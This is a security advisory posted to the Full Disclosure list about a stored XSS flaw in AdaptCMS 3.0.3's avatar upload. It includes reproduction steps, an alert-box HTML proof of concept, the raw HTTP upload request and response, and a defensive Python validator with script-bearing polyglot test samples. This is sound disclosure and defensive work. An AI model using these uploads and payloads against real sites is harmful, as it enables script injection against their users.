 
Full Disclosure mailing list archives
Stored XSS via File Upload - adaptcmsv3.0.3
From: Andrey Stoykov <mwebsec () gmail com>
Date: Sun, 1 Jun 2025 16:11:43 +0100
# Exploit Title: Stored XSS via File Upload - adaptcmsv3.0.3
# Date: 06/2025
# Exploit Author: Andrey Stoykov
# Version: 3.0.3
# Tested on: Debian 12
# Blog: https://msecureltd.blogspot.com/

Stored XSS via File Upload #1:

Steps to Reproduce:

1. Log in as a low-privilege user and visit "Profile" > "Edit Your Profile" > "Avatar"
2. Click on "Choose File" and upload the following file
html-xss.html
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Alert Box Example</title>
    <script>
        // This function will be called when the page loads
        function showAlert() {
            alert("Hello! This is an alert box.");
        }
    </script>
</head>
<body onload="showAlert()">
    <h1>Welcome to the Alert Box Example</h1>
    <p>This page will show an alert box when loaded.</p>
</body>
</html>
// HTTP POST request uploading the XSS file
POST /adaptcms/users/edit HTTP/1.1
Host: 192.168.58.131
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.0
[...]
[...]
------geckoformboundary5d089e6e18a0e8706d92f371cd6484c4
Content-Disposition: form-data; name="data[User][settings][avatar]"; filename="html-xss.html"
Content-Type: text/html
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Alert Box Example</title>
    <script>
        // This function will be called when the page loads
        function showAlert() {
            alert("Hello! This is an alert box.");
        }
    </script>
</head>
<body onload="showAlert()">
    <h1>Welcome to the Alert Box Example</h1>
    <p>This page will show an alert box when loaded.</p>
</body>
</html>
------geckoformboundary5d089e6e18a0e8706d92f371cd6484c4
Content-Disposition: form-data; name="data[_Token][fields]"
// HTTP Response
HTTP/1.1 200 OK
Date: Fri, 30 May 2025 20:15:54 GMT
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3
X-Powered-By: PHP/5.6.40
Content-Length: 15400
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
[...]
<img src="/adaptcms/uploads/avatars/1_html-xss.html" class="thumbnail col-lg-2" alt="" />
<input type="hidden" name="data[User][settings][old_avatar]" value="1_html-xss.html" id="UserSettingsOldAvatar"/>
<div class="clearfix"></div>
[...]
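The response above confirms the root cause: the avatar handler keeps the client-supplied name and extension ("1_html-xss.html") and places the file under the web root, so the uploaded HTML is later served from the application's own origin. The following is an added example, not code from AdaptCMS or from the advisory author: the CakePHP handler is not shown on the page, so this is a generic stand-in in Python with hypothetical names (validate_avatar, stored_filename, check_avatar). It layers the checks an avatar upload needs: an extension allowlist, magic-byte verification that the bytes really are an image, a check for image/HTML polyglots, and a server-chosen filename so nothing from the client reaches the filesystem. The sample inputs (the PoC page, a minimal PNG, a PNG with a script tag appended, an SVG) are constructed inline.

```python
"""Server-side avatar validation that would have rejected html-xss.html.

Added example with hypothetical names; not AdaptCMS code. Each check alone
is insufficient: an .html file renamed to .png passes the extension gate,
and a PNG with HTML appended passes the signature gate.
"""
import os
import re
import uuid

# Known raster-image signatures. The stored extension is derived from the
# detected type, never from the client-supplied filename.
IMAGE_SIGNATURES = {
    b"\x89PNG\r\n\x1a\n": "png",
    b"\xff\xd8\xff": "jpg",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}
ALLOWED_EXTENSIONS = {"png", "jpg", "jpeg", "gif"}
MAX_AVATAR_BYTES = 2 * 1024 * 1024

# Tags a browser honours when it sniffs a response as HTML; used to catch
# image/HTML polyglots that pass the signature check.
HTML_MARKERS = re.compile(
    rb"<(?:!doctype|html|head|body|script|svg|iframe|object|embed)\b", re.I
)


class UploadRejected(ValueError):
    """Raised when an upload fails validation; the message is safe to log."""


def detect_image_type(data: bytes):
    """Return 'png', 'jpg' or 'gif' from the leading bytes, else None."""
    for signature, kind in IMAGE_SIGNATURES.items():
        if data.startswith(signature):
            return kind
    return None


def validate_avatar(client_filename: str, data: bytes) -> str:
    """Validate an avatar upload and return its detected image type."""
    if not data:
        raise UploadRejected("empty upload")
    if len(data) > MAX_AVATAR_BYTES:
        raise UploadRejected("avatar too large")
    # 1. Extension allowlist on the client name (cheap first gate only).
    ext = os.path.splitext(client_filename)[1].lower().lstrip(".")
    if ext not in ALLOWED_EXTENSIONS:
        raise UploadRejected(f"extension '{ext or '(none)'}' not allowed")
    # 2. The bytes must start with a known image signature.
    kind = detect_image_type(data)
    if kind is None:
        raise UploadRejected("content is not a recognised image")
    # 3. Reject polyglots that a browser could still render as HTML.
    if HTML_MARKERS.search(data):
        raise UploadRejected("image contains HTML markup")
    return kind


def stored_filename(user_id: int, kind: str, token: str = "") -> str:
    """On-disk name: user id, random token, detected extension.

    AdaptCMS kept the client name ("1_html-xss.html" in the advisory);
    here nothing from the client is used.
    """
    return f"{user_id}_{token or uuid.uuid4().hex}.{kind}"


def check_avatar(client_filename: str, data: bytes):
    """Convenience wrapper: (True, image_type) or (False, reason)."""
    try:
        return True, validate_avatar(client_filename, data)
    except UploadRejected as err:
        return False, str(err)


# Constructed inputs (not captured from a real system).
POC_HTML = (
    b"<!DOCTYPE html>\n<html lang=\"en\"><head><script>\n"
    b"function showAlert() { alert(\"Hello! This is an alert box.\"); }\n"
    b"</script></head><body onload=\"showAlert()\"></body></html>\n"
)
TINY_PNG = (
    b"\x89PNG\r\n\x1a\n"
    b"\x00\x00\x00\rIHDR\x00\x00\x00\x01\x00\x00\x00\x01\x08\x02\x00\x00\x00\x90wS\xde"
    b"\x00\x00\x00\x00IEND\xaeB`\x82"
)
POLYGLOT_PNG = TINY_PNG + b"<script>alert(document.domain)</script>"
SVG_WITH_SCRIPT = b'<svg xmlns="http://www.w3.org/2000/svg"><script>alert(1)</script></svg>'

if __name__ == "__main__":
    for name, blob in [("html-xss.html", POC_HTML), ("html-xss.png", POC_HTML),
                       ("avatar.png", TINY_PNG), ("avatar.png", POLYGLOT_PNG),
                       ("avatar.svg", SVG_WITH_SCRIPT)]:
        accepted, detail = check_avatar(name, blob)
        print(f"{name:15} {'ACCEPT' if accepted else 'REJECT'}: {detail}")
```

The marker regex is a cheap heuristic; a stronger production choice is to decode and re-encode the image with an image library, which discards any foreign bytes. Independently of validation, upload directories should be served with an image Content-Type and X-Content-Type-Options: nosniff (or from a separate origin), so that even a file that slips through is never executed in the application's origin.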
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/